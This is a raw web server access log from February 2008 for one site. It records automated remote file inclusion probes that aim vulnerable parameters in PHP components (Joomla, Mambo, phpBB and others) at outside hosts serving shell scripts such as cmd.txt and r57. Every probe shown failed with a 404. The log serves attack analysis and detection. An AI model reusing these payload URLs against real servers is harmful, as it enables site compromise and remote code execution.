218.237.64.193 - - [19/Feb/2008:06:12:18 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:06:12:18 -0800] "GET /logs//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:06:12:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.71.13 - - [19/Feb/2008:06:12:32 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://soulisnet.gr/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [19/Feb/2008:06:12:32 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://soulisnet.gr/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [19/Feb/2008:06:12:33 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://soulisnet.gr/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:12:33 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:12:33 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:06:12:35 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:12:45 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:47 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:47 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:48 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:57 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:57 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:12:57 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:06:12:59 -0800] "GET /logs/access_080126.log/html/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:06:12:59 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:13:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:13:14 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:13:14 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:13:15 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:13:15 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:06:13:37 -0800] "GET /logs/access.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:13:45 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:13:46 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:13:46 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:13:48 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:13:48 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:13:48 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:13:54 -0800] "GET /logs/access_071230.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:06:13:58 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:06:13:58 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:14:22 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:14:22 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:14:23 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:14:32 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:14:32 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:14:38 -0800] "GET /logs/access_080126.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:14:38 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:14:38 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:14:38 -0800] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:14:40 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:06:15:08 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:06:15:08 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:06:15:08 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:06:15:29 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:06:15:30 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:15:32 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:15:34 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:06:15:36 -0800] "GET /logs/access_080126.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:06:15:41 -0800] "GET /logs/access_080120.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [19/Feb/2008:06:15:43 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Feb/2008:06:15:44 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Feb/2008:06:15:44 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:16:13 -0800] "GET /logs/access_080111.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:16:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:16:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:06:16:46 -0800] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:16:54 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:17:25 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.148.142.226 - - [19/Feb/2008:06:17:27 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.13.202 - - [19/Feb/2008:06:17:53 -0800] "GET /logs/access_080121.log//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:17:56 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [19/Feb/2008:06:17:58 -0800] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [19/Feb/2008:06:17:59 -0800] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:18:13 -0800] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:18:34 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:18:34 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:18:34 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.148.20.146 - - [19/Feb/2008:06:18:37 -0800] "GET /logs/access_080121.log//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [19/Feb/2008:06:18:37 -0800] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [19/Feb/2008:06:18:37 -0800] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:06:18:45 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:06:19:24 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.45.200 - - [19/Feb/2008:06:19:44 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:20:33 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [19/Feb/2008:06:20:51 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:06:21:03 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:21:20 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:06:21:25 -0800] "GET /logs/access_080131.log/index.php?body=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:06:21:25 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.13.202 - - [19/Feb/2008:06:21:34 -0800] "GET /logs/access_080123.log//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:21:55 -0800] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:21:55 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:06:22:19 -0800] "GET /logs/access_080117.log/index.php?body=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.148.20.146 - - [19/Feb/2008:06:22:59 -0800] "GET /logs/access_080123.log//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:24:13 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:24:15 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:24:23 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:24:23 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:25:00 -0800] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [19/Feb/2008:06:25:17 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://cmdz.diinoweb.com/files/cmd/id.gif?http://www.fuzi.by.ru/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [19/Feb/2008:06:25:37 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://cmdz.diinoweb.com/files/cmd/id.gif?http://www.fuzi.by.ru/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:25:42 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:25:42 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:25:42 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.143.84.82 - - [19/Feb/2008:06:25:44 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:25:50 -0800] "GET /logs/access_080121.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:25:50 -0800] "GET //stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:25:50 -0800] "GET /logs//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:26:29 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:26:29 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:26:29 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
